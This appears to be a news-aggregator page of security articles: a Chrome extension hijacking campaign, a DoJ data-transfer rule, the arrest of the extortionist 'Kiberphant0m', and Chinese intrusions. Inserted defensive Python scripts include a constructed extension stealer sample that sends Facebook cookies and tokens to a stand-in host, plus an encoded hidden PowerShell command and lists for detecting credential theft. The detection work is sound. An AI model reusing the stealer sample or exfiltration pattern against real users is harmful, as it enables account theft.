LATEST ARTICLES

New details reveal how hackers hijacked 35 Google Chrome extensions


New details have emerged about a phishing campaign targeting Chrome browser extension developers that led to the compromise of at least thirty-five extensions to inject data-stealing code, including those from cybersecurity firm Cyberhaven.

Although initial reports focused on Cyberhaven’s security-focused extension, subsequent investigations revealed that the same code had been injected into at least 35 extensions collectively used by roughly 2,600,000 people.

Judging from reports posted to LinkedIn and Google Groups by targeted developers, the latest campaign started around December 5, 2024. However, command-and-control subdomains found by BleepingComputer show that the infrastructure existed as far back as March 2024.

“I just wanted to alert people to a more sophisticated phishing email than usual that we got that stated a Chrome Extension policy violation of the form: ‘Unnecessary details in the description’,” reads the post to Google Groups’ Chromium Extensions group.

“The link in this email looks like the webstore but goes to a phishing website that will try to take control of your chrome extension and likely update it with malware.”

A deceptive OAuth attack chain

The attack begins with a phishing email sent to Chrome extension developers directly or through a support email associated with their domain name.

From emails seen by BleepingComputer, the following domains were used in this campaign to send the phishing emails:


supportchromestore.com
forextensions.com
chromeforextension.com

The phishing email, which is made to appear as if it comes from Google, claims that the extension is in violation of Chrome Web Store policies and is at risk of being removed.  

“We do not allow extensions with misleading, poorly formatted, non-descriptive, irrelevant, excessive, or inappropriate metadata, including but not limited to the extension description, developer name, title, icon, screenshots, and promotional images,” reads the phishing email.

Specifically, the extension’s developer is led to believe their software’s description contains misleading information and must agree to the Chrome Web Store policies.

The phishing email used in the attack (Source: Google Groups)

If the developer clicks the embedded ‘Go To Policy’ button to find out which rule they supposedly broke, they are taken to a legitimate Google sign-in and consent page on Google’s own domain, where a malicious OAuth application is requesting authorization.

The page is part of Google’s standard authorization flow, designed for securely granting permissions to third-party apps to access specific Google account resources.

The malicious authorization request page hosted on Google (Source: Cyberhaven)

On that platform, the attacker hosted a malicious OAuth application named “Privacy Policy Extension” that asked the victim to grant permission to manage Chrome Web Store extensions through their account.

“When you allow this access, Privacy Policy Extension will be able to: See, edit, update, or publish your Chrome Web Store extensions, themes, apps, and licenses you have access to,” reads the OAuth authorization page.

Permissions approval prompt (Source: Cyberhaven)

Multi-factor authentication did not help protect the account because no password was ever phished: the developer was already signed in to Google, and the OAuth consent flow hands the third-party application a token on the user’s approval without a fresh MFA challenge. The flow assumes the user fully understands the scope of the permissions they are granting.

“The employee followed the standard flow and inadvertently authorized this malicious third-party application,” explains Cyberhaven in a post-mortem writeup.

“The employee had Google Advanced Protection enabled and had MFA covering his account. The employee did not receive an MFA prompt. The employee’s Google credentials were not compromised.”
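The practical check that follows from the Cyberhaven post-mortem is an audit of which third-party OAuth clients already hold a grant on developer accounts, rather than a stronger login. The script below is an added example, not code from BleepingComputer or Cyberhaven: it flags grants that hold a scope allowing the client to publish Chrome Web Store items, and raises the severity when the client’s display name imitates a Google or Web Store component, as “Privacy Policy Extension” did. The records are constructed and carry a subset of the fields returned by the Admin SDK Directory API `users.tokens.list` call (clientId, displayText, scopes); the Chrome Web Store API scope URI and the allowlisted client ID are assumptions for the example.

```python
"""Audit a user's third-party OAuth grants for the consent-phishing pattern
described above: an app whose name imitates a Google or Chrome Web Store
component and that holds a scope allowing it to publish extensions.

Added example, not code from BleepingComputer or Cyberhaven. Records carry a
subset of the fields of the Admin SDK Directory API `users.tokens.list`
response (clientId, displayText, scopes); the records themselves are
constructed. The Chrome Web Store API scope URI and the allowlisted client ID
are assumptions for the example."""
import re

CHROME_WEBSTORE_SCOPE = "https://www.googleapis.com/auth/chromewebstore"  # assumed scope URI

# Scopes whose grant to an unknown client should be reviewed by hand.
HIGH_RISK_SCOPES = {
    CHROME_WEBSTORE_SCOPE: "can upload and publish new versions of your extensions",
    "https://mail.google.com/": "full mailbox read/send access",
    "https://www.googleapis.com/auth/drive": "full Drive access",
}

# Display names that try to read like part of Google or the Web Store itself.
LOOKALIKE_NAME = re.compile(r"\b(google|chrome|web ?store|policy|privacy)\b", re.IGNORECASE)

# Constructed sample grants; the first models the "Privacy Policy Extension" app.
SAMPLE_TOKENS = [
    {"clientId": "1234.apps.googleusercontent.com", "displayText": "Privacy Policy Extension",
     "scopes": [CHROME_WEBSTORE_SCOPE, "https://www.googleapis.com/auth/userinfo.email"]},
    {"clientId": "5678.apps.googleusercontent.com", "displayText": "Slack",
     "scopes": ["openid", "https://www.googleapis.com/auth/userinfo.email"]},
    {"clientId": "9012.apps.googleusercontent.com", "displayText": "Release pipeline",
     "scopes": [CHROME_WEBSTORE_SCOPE]},
]

# Client IDs allowed to hold the publish scope (assumed: the team's own CI client).
ALLOWLIST = frozenset({"9012.apps.googleusercontent.com"})


def audit_tokens(tokens, allowlist=frozenset()):
    """Return one finding per grant that holds a high-risk scope and is not allowlisted."""
    findings = []
    for tok in tokens:
        if tok["clientId"] in allowlist:
            continue
        risky = [s for s in tok["scopes"] if s in HIGH_RISK_SCOPES]
        if not risky:
            continue
        reasons = [f"{s}: {HIGH_RISK_SCOPES[s]}" for s in risky]
        if LOOKALIKE_NAME.search(tok["displayText"]):
            reasons.append("display name imitates a Google/Chrome Web Store component")
        # A publish scope held by a lookalike client is exactly the campaign's pattern.
        severity = "high" if CHROME_WEBSTORE_SCOPE in risky and len(reasons) > 1 else "medium"
        findings.append({"clientId": tok["clientId"], "app": tok["displayText"],
                         "severity": severity, "reasons": reasons})
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["app"]))


if __name__ == "__main__":
    for finding in audit_tokens(SAMPLE_TOKENS, ALLOWLIST):
        print(f"[{finding['severity']}] {finding['app']} ({finding['clientId']})")
        for reason in finding["reasons"]:
            print("   -", reason)
```

The allowlist is the only local knowledge the check needs; a publish-capable grant to any client not on it is worth a manual look regardless of how the client is named, and the lookalike test only decides how loudly to flag it.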

Once the threat actors gained access to the extension developer’s account, they modified the extension to include two malicious files, namely ‘worker.js’ and ‘content.js,’ which contained code to steal data from Facebook accounts.

The hijacked extension was then published as a “new” version on the Chrome Web Store.

While Extension Total is tracking thirty-five extensions impacted by this phishing campaign, IOCs from the attack indicate that a far greater number were targeted.

According to VirusTotal data, the threat actors pre-registered domains for the extensions they targeted, including extensions whose developers never fell for the phishing email.

While most domains were created in November and December, BleepingComputer found that the threat actors were testing this attack in March 2024.

Earlier subdomains used in the phishing campaign (Source: BleepingComputer)

Targeting Facebook business accounts

Analysis of compromised machines showed that the attackers were after the Facebook accounts of users of the poisoned extensions.

Specifically, the data-stealing code attempted to grab the user’s Facebook ID, access token, account info, ad account information, and business accounts.

Facebook data stolen by hijacked extensions (Source: Cyberhaven)

Additionally, the malicious code added a mouse click event listener specifically for the victim’s interactions on Facebook.com, looking for QR code images related to the platform’s two-factor authentication or CAPTCHA mechanisms.

This aimed to bypass 2FA protections on the Facebook account and allow the threat actors to hijack it.

The stolen information would be packaged together with Facebook cookies, the user agent string, Facebook ID, and the mouse click events and exfiltrated to the attacker’s command and control (C2) server.
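For anyone triaging an extension build after a developer account has been hijacked this way, the behaviour described above gives a concrete static checklist: a content script scoped to facebook.com, a click listener that watches for QR-code or CAPTCHA images, and code that reads Facebook tokens or cookies. The script below is an added example, not code from BleepingComputer or Cyberhaven. It unpacks nothing itself; it reads an already-unpacked extension directory, follows the manifest to the content scripts and service worker, and reports which indicators fire. The sample extension it writes is constructed, and the indicator patterns are assumptions derived from the article’s description rather than signatures taken from the real worker.js and content.js. The only page-sourced indicators are the three phishing-sender domains.

```python
"""Static triage of an unpacked Chrome extension for the behaviour described
above: a content script on facebook.com that captures clicks on QR/CAPTCHA
images, plus code that reads Facebook tokens or cookies.

Added example, not code from BleepingComputer or Cyberhaven. The sample
extension written by write_sample() is constructed, and the indicator regexes
are assumptions based on the article's description, not signatures taken from
the real worker.js/content.js payload."""
import json
import re
import tempfile
from pathlib import Path

# Domains the article names as senders of the phishing emails.
CAMPAIGN_DOMAINS = ("supportchromestore.com", "forextensions.com", "chromeforextension.com")

INDICATORS = {
    "facebook_token": re.compile(r"access_token|/me/adaccounts|/me/businesses", re.I),
    "click_capture": re.compile(r"addEventListener\(\s*['\"](click|mousedown)['\"]", re.I),
    "qr_or_captcha": re.compile(r"\bqr\b|captcha", re.I),
    "cookie_read": re.compile(r"document\.cookie|chrome\.cookies\.getAll"),
    "campaign_domain": re.compile("|".join(re.escape(d) for d in CAMPAIGN_DOMAINS), re.I),
}


def scan_extension(root):
    """Scan the facebook.com content scripts and the service worker; return hits and a verdict."""
    root = Path(root)
    manifest = json.loads((root / "manifest.json").read_text(encoding="utf-8"))
    fb_scripts = []
    for cs in manifest.get("content_scripts", []):
        if any("facebook.com" in m for m in cs.get("matches", [])):
            fb_scripts.extend(cs.get("js", []))
    to_scan = list(dict.fromkeys(fb_scripts))  # dedupe, keep manifest order
    worker = manifest.get("background", {}).get("service_worker")
    if worker and worker not in to_scan:
        to_scan.append(worker)
    hits = {}
    for rel in to_scan:
        path = root / rel
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        fired = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if fired:
            hits[rel] = fired
    all_fired = {n for names in hits.values() for n in names}
    steals = bool(all_fired & {"facebook_token", "cookie_read"})
    if fb_scripts and steals and "click_capture" in all_fired:
        verdict = "likely Facebook account stealer"
    elif fb_scripts and steals:
        verdict = "facebook data access, review manually"
    elif all_fired:
        verdict = "weak indicators only"
    else:
        verdict = "no indicators"
    return {"name": manifest.get("name"), "version": manifest.get("version"),
            "facebook_content_scripts": fb_scripts, "hits": hits, "verdict": verdict}


def write_sample(dir_=None, malicious=True):
    """Write a constructed extension (malicious or benign) to dir_ (a temp dir if None)."""
    dir_ = Path(dir_) if dir_ else Path(tempfile.mkdtemp()) / "sample-extension"
    dir_.mkdir(parents=True, exist_ok=True)
    manifest = {"manifest_version": 3, "name": "Helpful Tools", "version": "2.4.1",
                "permissions": ["cookies", "storage"],
                "background": {"service_worker": "worker.js"},
                "content_scripts": [{"matches": ["https://*.facebook.com/*"], "js": ["content.js"]}]}
    content_js = """// constructed stand-in for the click-capturing content script
document.addEventListener('click', function (e) {
  if (e.target.tagName === 'IMG' && /qr|captcha/i.test(e.target.alt || '')) {
    chrome.runtime.sendMessage({kind: 'click', src: e.target.src, ua: navigator.userAgent});
  }
});
"""
    worker_js = """// constructed stand-in for the token/cookie collector (posts to a reserved test domain)
chrome.runtime.onMessage.addListener(function (msg) {
  chrome.cookies.getAll({domain: 'facebook.com'}, function (cookies) {
    fetch('https://graph.facebook.com/me/adaccounts?access_token=' + msg.token);
    fetch('https://example.invalid/collect', {method: 'POST', body: JSON.stringify({msg, cookies})});
  });
});
"""
    (dir_ / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
    (dir_ / "content.js").write_text(
        content_js if malicious else "document.body.dataset.helper = '1';\n", encoding="utf-8")
    (dir_ / "worker.js").write_text(
        worker_js if malicious else "chrome.runtime.onInstalled.addListener(function () {});\n",
        encoding="utf-8")
    return dir_


if __name__ == "__main__":
    print(json.dumps(scan_extension(write_sample()), indent=2))
```

The verdict deliberately requires both a data-access indicator and the click listener before calling something a stealer; a legitimate Facebook helper extension will read cookies or tokens, but it has no reason to watch for clicks on 2FA QR codes.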

Threat actors have been targeting Facebook business accounts via various attack pathways to make direct payments from the victim’s credit to their account, run disinformation or phishing campaigns on the social media platform, or monetize their access by selling it to others.




New U.S. DoJ Rule Halts Bulk Data Transfers to Adversarial Nations to Protect Privacy


Dec 31, 2024Ravie LakshmananData Security / Privacy


The U.S. Department of Justice (DoJ) has issued a final rule carrying out Executive Order (EO) 14117, which prevents mass transfer of citizens’ personal data to countries of concern such as China (including Hong Kong and Macau), Cuba, Iran, North Korea, Russia, and Venezuela.

“This final rule is a crucial step forward in addressing the extraordinary national security threat posed by our adversaries exploiting Americans’ most sensitive personal data,” said Assistant Attorney General Matthew G. Olsen of the Justice Department’s National Security Division.


“This powerful new national-security program is designed to ensure that Americans’ personal data is no longer permitted to be sold to hostile foreign powers, whether through outright purchase or other means of commercial access.”

Back in February 2024, U.S. President Joe Biden signed an executive order to address the national risk posed by unauthorized access to Americans’ sensitive personal and government-related data for malicious activities, such as espionage, influence, kinetic, or cyber operations.

Furthermore, the order noted that the countries of concern can leverage their access to bulk data to develop or refine artificial intelligence and other advanced technologies, as well as purchase such information from commercial data brokers and other companies.

“Countries of concern and covered persons can also exploit this data to collect information on activists, academics, journalists, dissidents, political opponents, or members of nongovernmental organizations or marginalized communities to intimidate them; curb political opposition; limit freedoms of expression, peaceful assembly, or association; or enable other forms of suppression of civil liberties,” the DoJ said.

The rule issued by the DoJ is expected to become effective in 90 days. It identifies certain classes of prohibited, restricted, and exempt transactions; sets bulk thresholds for triggering the rule’s prohibitions and restrictions on covered data transactions involving bulk sensitive personal data; and establishes enforcement mechanisms such as civil and criminal penalties.


This covers data spanning six categories: personal identifiers (e.g., Social Security numbers, driver’s license etc.), precise geolocation data, biometric identifiers, human ‘omic (genomic, epigenomic, proteomic, and transcriptomic) data, personal health data, and personal financial data.

However, it bears noting that the rule neither imposes data localization requirements, nor does it prohibit U.S. citizens from conducting medical, scientific, or other research in countries of concern.

“The final rule also does not broadly prohibit U.S. persons from engaging in commercial transactions, including exchanging financial and other data as part of the sale of commercial goods and services with countries of concern or covered persons, or impose measures aimed at a broader decoupling of the substantial consumer, economic, scientific, and trade relationships that the United States has with other countries,” the DoJ said.





U.S. Army Soldier Arrested in AT&T, Verizon Extortions – Krebs on Security


Federal authorities have arrested and indicted a 20-year-old U.S. Army soldier on suspicion of being Kiberphant0m, a cybercriminal who has been selling and leaking sensitive customer call records stolen earlier this year from AT&T and Verizon. As first reported by KrebsOnSecurity last month, the accused is a communications specialist who was recently stationed in South Korea.

One of several selfies on the Facebook page of Cameron Wagenius.

Cameron John Wagenius was arrested near the Army base in Fort Hood, Texas on Dec. 20, after being indicted on two criminal counts of unlawful transfer of confidential phone records.

The sparse, two-page indictment (PDF) doesn’t reference specific victims or hacking activity, nor does it include any personal details about the accused. But a conversation with Wagenius’ mother — Minnesota native Alicia Roen — filled in the gaps.

Roen said that prior to her son’s arrest he’d acknowledged being associated with Connor Riley Moucka, a.k.a. “Judische,” a prolific cybercriminal from Canada who was arrested in late October for stealing data from and extorting dozens of companies that stored data at the cloud service Snowflake.

In an interview with KrebsOnSecurity, Judische said he had no interest in selling the data he’d stolen from Snowflake customers and telecom providers, and that he preferred to outsource that to Kiberphant0m and others. Meanwhile, Kiberphant0m claimed in posts on Telegram that he was responsible for hacking into at least 15 telecommunications firms, including AT&T and Verizon.

On November 26, KrebsOnSecurity published a story that followed a trail of clues left behind by Kiberphant0m indicating he was a U.S. Army soldier stationed in South Korea.

An 18-year-old Cameron Wagenius, joining the U.S. Army.

Ms. Roen said Cameron worked on radio signals and network communications at an Army base in South Korea for the past two years, returning to the United States periodically. She said Cameron was always good with computers, but that she had no idea he might have been involved in criminal hacking.

“I never was aware he was into hacking,” Roen said. “It was definitely a shock to me when we found this stuff out.”

Ms. Roen said Cameron joined the Army as soon as he was of age, following in his older brother’s footsteps.

“He and his brother when they were like 6 and 7 years old would ask for MREs from other countries,” she recalled, referring to military-issued “meals ready to eat” food rations. “They both always wanted to be in the Army. I’m not sure where things went wrong.”

Immediately after news broke of Moucka’s arrest, Kiberphant0m posted on the hacker community BreachForums what they claimed were the AT&T call logs for President-elect Donald J. Trump and for Vice President Kamala Harris.

“In the event you do not reach out to us @ATNT all presidential government call logs will be leaked,” Kiberphant0m threatened, signing their post with multiple “#FREEWAIFU” tags. “You don’t think we don’t have plans in the event of an arrest? Think again.”

Kiberphant0m posting what he claimed was a “data schema” stolen from the NSA via AT&T.

On that same day, Kiberphant0m posted what they claimed was the “data schema” from the U.S. National Security Agency.

On Nov. 5, Kiberphant0m offered call logs stolen from Verizon’s push-to-talk (PTT) customers — mainly U.S. government agencies and emergency first responders. On Nov. 9, Kiberphant0m posted a sales thread on BreachForums offering a “SIM-swapping” service targeting Verizon PTT customers. In a SIM-swap, fraudsters use credentials that are phished or stolen from mobile phone company employees to divert a target’s phone calls and text messages to a device they control.

The profile photo on Wagenius’ Facebook page was deleted within hours of my Nov. 26 story identifying Kiberphant0m as a likely U.S. Army soldier. Still, many of his original profile photos remain, including several that show Wagenius in uniform while holding various Army-issued weapons.

Several profile photos visible on the Facebook page of Cameron Wagenius.

November’s story on Kiberphant0m cited his own Telegram messages saying he maintained a large botnet that was used for distributed denial-of-service (DDoS) attacks to knock websites, users and networks offline. In 2023, Kiberphant0m sold remote access credentials for a major U.S. defense contractor.

Allison Nixon, chief research officer at the New York-based cybersecurity firm Unit 221B, helped track down Kiberphant0m’s real life identity. Nixon was among several security researchers who faced harassment and specific threats of violence from Judische and his associates.

“Anonymously extorting the President and VP as a member of the military is a bad idea, but it’s an even worse idea to harass people who specialize in de-anonymizing cybercriminals,” Nixon told KrebsOnSecurity. She said the investigation into Kiberphant0m shows that law enforcement is getting better and faster at going after cybercriminals — especially those who are actually living in the United States.

“Between when we, and an anonymous colleague, found his opsec mistake on November 10th to his last Telegram activity on December 6, law enforcement set the speed record for the fastest turnaround time for an American federal cyber case that I have witnessed in my career,” she said.

Nixon asked to share a message for all the other Kiberphant0ms out there who think they can’t be found and arrested.

“I know that young people involved in cybercrime will read these articles,” Nixon said. “You need to stop doing stupid shit and get a lawyer. Law enforcement wants to put all of you in prison for a long time.”

The indictment against Wagenius was filed in Texas, but the case has been transferred to the U.S. District Court for the Western District of Washington in Seattle.




China’s cyber intrusions turn sinister in 2024 • The Register


The Chinese government’s intrusions into America’s telecommunications and other critical infrastructure networks this year appear to signal a shift from cyberspying as usual to prepping for destructive attacks.

The FBI and other US federal agencies rang in 2024 boasting about disrupting a Chinese botnet composed of “hundreds” of outdated routers intent on breaking into US critical infrastructure facilities. Spoiler alert: the botnet is back.

This same government-backed crew also compromised at least one large US city’s emergency services network, and has been conducting reconnaissance and enumeration of “multiple” American electric companies since early 2023.

Soon after these intrusions came to light, the Feds began issuing very public alerts that Volt Typhoon was preparing to “wreak havoc” on American infrastructure and “cause societal chaos” in the US. 

“Volt Typhoon’s choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the US authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable lateral movement to OT assets to disrupt functions,” the government agencies warned.

The public learned later in the year that another Beijing hacking unit, this one called Salt Typhoon, had broken into American telecommunications networks in what one senior US senator called the “worst telecom hack in our nation’s history – by far.”

According to government and infosec sources, the attacks remain ongoing.

“We cannot say with certainty that the adversary has been evicted, because we still don’t know the scope of what they’re doing,” Jeff Greene, CISA’s executive assistant director for cybersecurity, told reporters during a Salt Typhoon briefing in early December.

‘Every org should be put on notice’

“Every organization should look at this as being put on notice that there are hostile nation state entities,” CrowdStrike Senior VP of Counter Adversary Operations Adam Meyers told The Register. “If you are involved in any degree of business that ties into the broader international ecosystem, or you’re providing services that are of logistical importance for critical infrastructure, you’re in the line of fire.” 

CrowdStrike tracks 63 different China-linked groups, and about two dozen of these are currently active, according to Meyers. In November, Meyers testified before a Senate committee on how the cyberthreats from the Middle Kingdom have evolved over the past two decades. 

Prior to 2015, these tended to be “smash-and-grab” raids, he said, noting that over the years, they have become more targeted intrusions that focus on high-value individuals and information: sources of political and military secrets, and intellectual property that can advance China’s national interests.

Even more worrisome is that at least one of these state-sponsored groups, Volt Typhoon, which CrowdStrike tracks as “Vanguard Panda,” appears to be pre-positioning deep inside American critical infrastructure networks so it’s ready for disruptive or destructive attacks preceding or coinciding with military activities.

“The reason that Vanguard Panda attracted so much attention was that it was the first time that there was a demonstrable aspect of pre-positioning,” Meyers said during an interview. “This would be like if the Russians, back in the ’60s, thought they were going to invade the United States. Their pre-positioning would be to hide caches of weapons and resources that they could access as they mounted their invasion across the US.”


Plus, it’s unlikely that blowing up the botnet earlier this year did anything to disrupt the larger organization, or its future plans, he added.

“Disrupting that did not impact Vanguard Panda,” Meyers said. “It did not impact their ability to access the targets that they had gained access to and were continuing to maintain persistence.”

He said he’s doubtful that Volt Typhoon/Vanguard Panda was even running the botnet infrastructure. “That was likely another group that was tasked with providing communications infrastructure, and when that got disrupted, you would have to expect that there would have been a secondary path that would have been on standby,” Meyers noted. “They’re not going to just leave things to chance. If there’s a primary mechanism that they’re using, then they want a secondary and a tertiary one.” 

Before implanting the KV botnet malware on routers and other devices, Volt Typhoon has to break in, which usually involves exploiting bugs in firewalls, VPN appliances, and web servers, or abusing misconfigurations or weak – sometimes non-existent – passwords in these products.

Volt Typhoon’s post-exploitation activity

Tenable last month published a list of some of the CVEs that the crew has exploited in the past to gain initial access. These include a vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVPN software that allows a remote, unauthenticated attacker to upload a file to any location on the filesystem (CVE-2021-27860), a critical authentication bypass flaw in Zoho ManageEngine ADSelfService Plus (CVE-2021-40539), two critical heap-based buffer overflow bugs in Fortinet FortiOS and FortiProxy (CVE-2022-42475 and CVE-2023-27997) and a file upload flaw in Versa Director SD-WAN (CVE-2024-39717). 

Lumen Technologies’ Black Lotus Labs in August warned that Volt Typhoon was abusing the Versa vulnerability CVE-2024-39717 to plant custom, credential-harvesting web shells on customers’ networks and noted that these attacks are “likely ongoing” against unpatched systems.

“What’s unique about Volt Typhoon is the post-exploitation activity,” Tenable research engineer Scott Caveza told The Register. It doesn’t use custom malware, which can be more easily spotted by antivirus software, but instead uses legitimate software products and credentials to snoop around and avoid detection. 

These include Windows tools (cmd.exe, netsh, and PowerShell) for command execution and lateral movement, Mimikatz to extract credentials from memory, Remote Desktop Protocol (RDP) to burrow deeper into internal systems, and Windows Task Scheduler to establish scheduled tasks for regular, persistent access.

“Just executing normal commands and binaries that would be found on a Windows system to do reconnaissance, and further their way through the network,” Caveza said. “It’s very stealth activity, and really speaks to the skill this group has at evading security software suites and making the traffic look seemingly normal.”
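Because none of those tools is malware, detection has to come from the combination and context of their use rather than from any single binary. The script below is an added example, not code from Tenable, CISA or The Register, showing one way to hunt for the chain described above in Windows telemetry: an RDP logon (Security event 4624, logon type 10), built-in tooling such as cmd.exe, netsh and PowerShell launched under that session (Sysmon event 1), a handle opened on LSASS as Mimikatz does (Sysmon event 10), and a scheduled task created for persistence (Security event 4698). The event records are constructed in a flattened JSON shape with assumed field names (event_id, host, user, ts, image, cmdline, target_image, task) such as a log pipeline might emit; the hosts, users and command lines are invented.

```python
"""Hunt for the living-off-the-land chain described above in Windows telemetry:
an RDP logon, built-in tooling (cmd.exe, netsh, PowerShell) run under that
session, a handle opened on LSASS as Mimikatz would, and a scheduled task
created for persistence.

Added example, not code from Tenable, CISA or The Register. The records are
constructed in a flattened JSON shape (assumed fields: event_id, host, user,
ts, plus per-event fields) for Security 4624/4698 and Sysmon 1/10 events;
hosts, users and command lines are invented."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOTL_BINARIES = {"cmd.exe", "netsh.exe", "powershell.exe", "wmic.exe", "ntdsutil.exe", "schtasks.exe"}
ENCODED_PS = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [  # constructed
    {"event_id": 4624, "host": "WS-OPS-07", "user": "svc_backup", "ts": "2024-06-03T02:14:05Z",
     "logon_type": 10, "src_ip": "10.20.1.15"},
    {"event_id": 1, "host": "WS-OPS-07", "user": "svc_backup", "ts": "2024-06-03T02:15:40Z",
     "image": "C:\\Windows\\System32\\cmd.exe", "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "cmd.exe /c netsh interface show interface"},
    {"event_id": 1, "host": "WS-OPS-07", "user": "svc_backup", "ts": "2024-06-03T02:16:02Z",
     "image": "C:\\Windows\\System32\\netsh.exe", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "netsh interface show interface"},
    {"event_id": 1, "host": "WS-OPS-07", "user": "svc_backup", "ts": "2024-06-03T02:21:19Z",
     "image": PS, "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "powershell -nop -w hidden -enc SQBFAFgA"},  # base64 of UTF-16LE "IEX"
    {"event_id": 10, "host": "WS-OPS-07", "user": "svc_backup", "ts": "2024-06-03T02:22:48Z",
     "source_image": PS, "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1010"},
    {"event_id": 4698, "host": "WS-OPS-07", "user": "svc_backup", "ts": "2024-06-03T02:30:11Z",
     "task": "\\Microsoft\\Windows\\UpdateCheck"},
    # Ordinary admin activity on another host: console logon, PowerShell from Explorer.
    {"event_id": 4624, "host": "WS-HR-02", "user": "jsmith", "ts": "2024-06-03T08:01:00Z", "logon_type": 2},
    {"event_id": 1, "host": "WS-HR-02", "user": "jsmith", "ts": "2024-06-03T08:05:30Z",
     "image": PS, "parent": "C:\\Windows\\explorer.exe", "cmdline": "powershell.exe Get-ChildItem C:\\Reports"},
]


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _ts(event):
    return datetime.fromisoformat(event["ts"].replace("Z", "+00:00"))


def signals_for(event):
    """Map one event to zero or more named signals."""
    eid = event["event_id"]
    out = []
    if eid == 4624 and event.get("logon_type") == 10:
        out.append("rdp_logon")
    elif eid == 1:
        image = _base(event.get("image", ""))
        if image in LOTL_BINARIES:
            out.append("lotl_exec")
        if image == "powershell.exe" and ENCODED_PS.search(event.get("cmdline", "")):
            out.append("encoded_powershell")
    elif eid == 10 and _base(event.get("target_image", "")) == "lsass.exe":
        out.append("lsass_access")
    elif eid == 4698:
        out.append("scheduled_task")
    return out


def hunt(events, min_signals=3, window=timedelta(hours=24)):
    """Group events by (host, user) and alert when at least min_signals distinct
    signals occur within `window` of the first RDP logon (or first event if none)."""
    by_key = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_key[(e["host"], e["user"])].append(e)
    alerts = []
    for (host, user), evs in by_key.items():
        start = next((_ts(e) for e in evs if "rdp_logon" in signals_for(e)), _ts(evs[0]))
        seen = {}  # signal name -> first timestamp it fired
        for e in evs:
            if not (start <= _ts(e) <= start + window):
                continue
            for s in signals_for(e):
                seen.setdefault(s, e["ts"])
        if len(seen) >= min_signals:
            alerts.append({"host": host, "user": user, "signals": seen, "first_seen": min(seen.values())})
    return sorted(alerts, key=lambda a: -len(a["signals"]))


if __name__ == "__main__":
    for alert in hunt(EVENTS):
        print(f"{alert['host']} / {alert['user']} from {alert['first_seen']}: {sorted(alert['signals'])}")
```

The threshold is the tuning knob: a single PowerShell launch or a single RDP logon is normal on any admin workstation, which is why the benign host in the sample never alerts, while the same binaries strung together under one remote session with an LSASS handle and a new scheduled task are what the Tenable and CISA descriptions of Volt Typhoon actually look like on the wire.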

In addition to Volt Typhoon and some of the other Chinese government groups using stealthy, so-called “living-off-the-land” techniques, another noteworthy aspect of their ongoing operations targeting critical industries is the US government’s very loud response to the attacks. 

Caught in the cookie jar

Not only did the FBI, CISA, and other government agencies sound the alarm on the Chinese intruders, but they also published a threat hunting guide and listed actions to mitigate Volt Typhoon activity, including patching internet-facing systems, using phishing-resistant multi-factor authentication, and ditching outdated gear that is no longer supported by the manufacturer.

“Number one, kudos to our government,” ZeroFox VP of Intelligence Adam Darrah told The Register. “I do applaud the United States government for being more bold in publicizing these campaigns and saying here’s how to prevent this being an issue. It’s a way to crowdsource national defense.”

While every major intelligence agency in the world spies on adversarial – and sometimes even friendly – government, China’s cyberoperations this year should be a “wake-up call” to people, Darrah added. 

“China has historically been very careful and good about not getting publicly caught with their hand in the American military cookie jar,” he said. “So what was interesting to me: Number one they got caught. Number two: it was publicized. And number three: I’m happy to see this, because it’s time to stop pretending China is this peaceful country that only wants to steal our IP for economic and trade reasons. That’s not true.”

Rafe Pilling, director of threat intelligence for the Secureworks Counter Threat Unit, also highlighted the US government’s efforts to encourage people to mitigate the threat posed by Volt Typhoon. And not only “the threat that has been posed today” with the targeted reconnaissance and espionage activities, “but perhaps more about the threat posed in the future – the wider, unknown activity that might be out there.”

“This includes the pre-positioning warnings and readying for future attacks.”

Pilling’s team covers the gamut of threat groups, from financially motivated cybercrime organizations to nation-state attackers, and China “consistently tops our list of state sponsored actors,” he told The Register.

The first cases that Secureworks now attributes to Volt Typhoon (it tracks this crew as Bronze Silhouette) occurred in June and September 2021.

But at the time, “we had a number of incidents we responded to for customers involving that threat group that we just had a question mark over,” Pilling said. “They didn’t fall into any of the other buckets we tracked, so we put a question mark, ‘China?’ over those incidents.”

It was only years later, after information sharing efforts with public and private researchers, “that you see there is this wider set of activities targeting organizations in mainland United States all the way out to telcos in Guam,” he added. 

But even back in 2021, “the activity we saw certainly looked like access-type operations,” Pilling said. “Once you get past the access stage, you can achieve a number of intents, everything from espionage to pre-positioning for disruptive operations. And they’re not mutually exclusive.”

While security and incident response firms get called in after an attack has occurred, the defenders on the front lines are those working in the water, electric grid, oil and gas, and other critical sectors.

Front-line defenders

Those defenders include the customers of operational technology (OT) security vendor Xona Systems, and the consensus among them is: “There’s a lot more that could be done to protect critical infrastructure,” COO Bill Cantrell told The Register. “The overriding theme is that there’s just not enough funding.”

The biggest concern among critical infrastructure owners and operators continues to be physical safety and reliability. “Those things have always been at the forefront in this industry,” Cantrell said. “There’s a lot of very dangerous, high-power equipment and so it’s making sure it’s reliable, it’s safe, and there are good backup procedures.”

These are very real concerns. Critical systems providing drinking water or heat can’t fail without potential life-and-death consequences, and shutting down these systems to update or patch security flaws introduces a raft of physical-world risks.

Over the last several years, however, there have been added concerns around network connectivity and remote access as more OT and IoT devices and systems become connected to the internet. 

“It’s a new vector of pressure that has been put on these OT folks,” Cantrell said. “It’s a world where the OT guys don’t understand the networking and cyber issues, and the IT guys don’t really understand all of the constraints around safety and reliability that go along with these OT networks.”

